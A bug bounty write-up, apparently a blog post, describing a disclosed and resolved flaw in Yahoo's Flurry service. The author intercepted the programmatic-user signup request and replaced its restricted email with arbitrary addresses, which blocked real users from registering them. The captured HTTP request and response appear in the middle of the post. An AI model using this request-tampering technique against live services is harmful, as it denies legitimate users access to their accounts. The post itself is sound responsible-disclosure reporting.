DOS attack in Yahoo, How i was able to deny new users from service?

Hey All ,

This writeup describes how i was able to deny new-upcoming users from using Flurry service.

According to Wiki , Flurry is an American mobile analytics, monetization, advertising company and a subsidiary of Yahoo.

Denial Of Service Attack

I created an account regularly from https://login.flurry.com/signup and i spotted a Sub-Users feature at https://dev.flurry.com/admin/users

This feature allows you to :

  • Invite a sub user with a customized permissions
  • Create a programmatic user with api permissions

Programmatic users allowed only to be used with api through access tokens which is generated through the account who created it.

Used programmatic one, i got an access token and a random mail address @programmatic.flurry.com

All programmatic users emails are restricted only to @programmatic.flurry.com

So i opened burp, intercepted the request to Programmatic user

PATCH /pulse/v1/ HTTP/2
Host: ecto.flurry.com
[{“op”:”add”,”path”:”user”,”value”:{“type”:”user”,”id”:”5b1b8f87–9d79–4516–8576-f77e4411a46a”,”attributes”:{“email”:”354732_bd6adce9–2118–4fb9-a043–009f49968553@programmatic.flurry.com”,”programmatic”:”true”}}},{“op”:”add”,”path”:”user/5b1b8f87–9d79–4516–8576-f77e4411a46a/memberships”,”value”:{“type”:”membership”,”id”:”f3ca1d13–12d1–4b0c-8faa-fc14ffb499a3",”attributes”:{“role”:”NONE”,”title”:*",”productRoles”:{“Analytics”:”VIEWER”,”AppSpot”:”VIEWER”,”AdAnalytics”:”NONE”,”RawDataDownload”:”DEV”,”GDPRDataSubjectRights”:”NONE”}},”relationships”:{“company”:{“data”:[{“type”:”company”,”id”:”354732"}]},”user”:{“data”:[{“type”:”user”,”id”:”5b1b8f87–9d79–4516–8576-f77e4411a46a”}]}}}}]

I changed value of email to a one like mostafa@gmail.com and it worked

HTTP/2 200 OK[{“data”:{“type”:”user”,”id”:”482035",”attributes”:{“email”:”mostafa@gmail.com”,”firstName”:null,”lastName”:null,”programmatic”:true},”relationships”:{“memberships”:{“data”:[{“type”:”membership”,”id”:”547510"}]}}}},{“data”:{“type”:”membership”,”id”:”547510",”attributes”:{“creationDate”:null,”limitAccess”:false,”limitedAccessProjects”:[],”primaryMembership”:false,”productRoles”:{“Analytics”:”VIEWER”,”AppSpot”:”VIEWER”,”AdAnalytics”:”NONE”,”RawDataDownload”:”DEV”,”GDPRDataSubjectRights”:”NONE”},”role”:”NONE”,”title”:”Cairo programmatic 90477"},”relationships”:{“company”:{“data”:{“type”:”company”,”id”:”354732"}},”user”:{“data”:{“type”:”user”,”id”:”482035"}}}}}]

Then i went to create an account normally with mostafa@gmail.com it was saying Email already exists , i tried to reset password for account and after changing password it said Invalid email or password .

i used the same attack with emails like [administrator-admin-support-test-contact-it-security]@flurry.com

I could deny a large common list of emails belonging to @flurry.com, @yahoo.com from using the service where the only option to use these accounts through access token which is mainly generated by another account.

This allowed me to deny the service permanently of any possible accounts will be newly created.

Report Timeline:

  • December 17,2019 — Bug reported
  • December 21,2019 — Bug triaged
  • January 28,2020 — Bug resolved
  • February 12,2020–Bounty rewarded 1000$